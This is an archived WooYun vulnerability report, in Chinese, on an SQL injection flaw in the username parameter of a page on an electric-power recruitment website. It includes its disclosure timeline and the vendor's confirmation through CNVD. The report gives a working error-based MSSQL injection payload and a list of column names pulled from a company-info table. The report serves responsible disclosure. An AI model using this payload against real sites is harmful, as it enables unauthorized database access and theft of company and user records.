当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143921

漏洞标题:电力高级人才网SQL注入漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: 渔村安全实验室

提交时间:2015-10-06 23:14

修复时间:2015-11-26 11:26

公开时间:2015-11-26 11:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-06: 细节已通知厂商并且等待厂商处理中
2015-10-12: 厂商已经确认,细节仅向厂商公开
2015-10-22: 细节向核心白帽子及相关领域专家公开
2015-11-01: 细节向普通白帽子公开
2015-11-11: 细节向实习白帽子公开
2015-11-26: 细节向公众公开

简要描述:

电力高级人才网(http://www.dlgaoji.com/)创建于2004年,一直从事于电力猎头服务,公司拥有国内最大,最专业的电力人才猎头团队,对中国电力行业有深度的理解,对电力人才的分布了如指掌,研究行业内顶尖人才的分布与流动,积累了电力行业的海量人脉资源和简历,也是中国第一家专注于中国电力行业的猎头机构;随着公司不断的业务发展于2008正式上线电力高级人才网,网站主要从事2大模块;(1)人力资源模块(网站招聘、猎头服务、RPO项目、简历推荐、薪酬调查等、广告招聘等);(2)电力论坛模块(产品推广、产品发布与采购、公司宣传、技术交流、资料分享等),由深圳市必高人力资源有限公司运营,公司在运营二大模块期间不仅帮助客户解决了招人之困境,更重要的是为公司品牌的宣传推广、产品的销售创造了不菲的收益!为公司在人事、采购、销售、技术上等提供全方位一条龙服务!
电力高级人才网(http://www.dlgaoji.com/)主要服务对象包括电厂、电力工程、电力设计、电力设备、电力环保、核电、风电等电力类企业。目前电力高级人才网拥有超过电力行业70万的专业用户,用户全部在电力行业拥有一年以上的工作经验。
电力高级人才网(http://www.dlgaoji.com/)在电力领域最具优势人才有:发输变电设计、配电/配网设计、发电厂设计;电建EPC、土建、造价、项目工程、总工;核电、电厂运行检修、电厂管理、脱硫脱销、电力环保;电气设备、柜体设计、电气工程师、销售营销、生产管理等。

详细说明:

http://**.**.**.**/job_sendpws.aspx?username=


username可注入

http://**.**.**.**/job_sendpws.aspx?username=' AND 4392=CONVERT(INT,%28SELECT%20CHAR%28119%29%2bCHAR%2876%29%2bCHAR%2876%29%2bCHAR%2872%29%2b%28SELECT%20%28CASE%20WHEN%20%284392%3D4392%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2bCHAR%2885%29%2bCHAR%2871%29%2bCHAR%2870%29%2bCHAR%2890%29%29%29%20AND 'MUuV'='MUuV


QQ截图20150928165922.png


部分表项信息

gj_companyinfo
8073
agreeenddate
agreeid
agreestartdate
agreetype
classid
CltIP
compabstruct
compid
complogo
compname
compno
compremark
compresouce
comprole
comptrade
comptype
compwww
compyyz
contactadr
contactcity
contactemail
contactfax
contactname
contactphone
contactpostcode
contacttel
createdate
inputcode
inputdate
inputname
ishiddenemail
ishiddenfax
ishiddentel
lookjobtel
modicode
modidate
modiname
moneytype
numbercount
regcode
regdate
regmoney
regname
sharetype


QQ截图20150928170645.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 渔村安全实验室@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-10-12 11:24

厂商回复:


CNVD确认并复现所述情况,已由CNVD通过网站公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无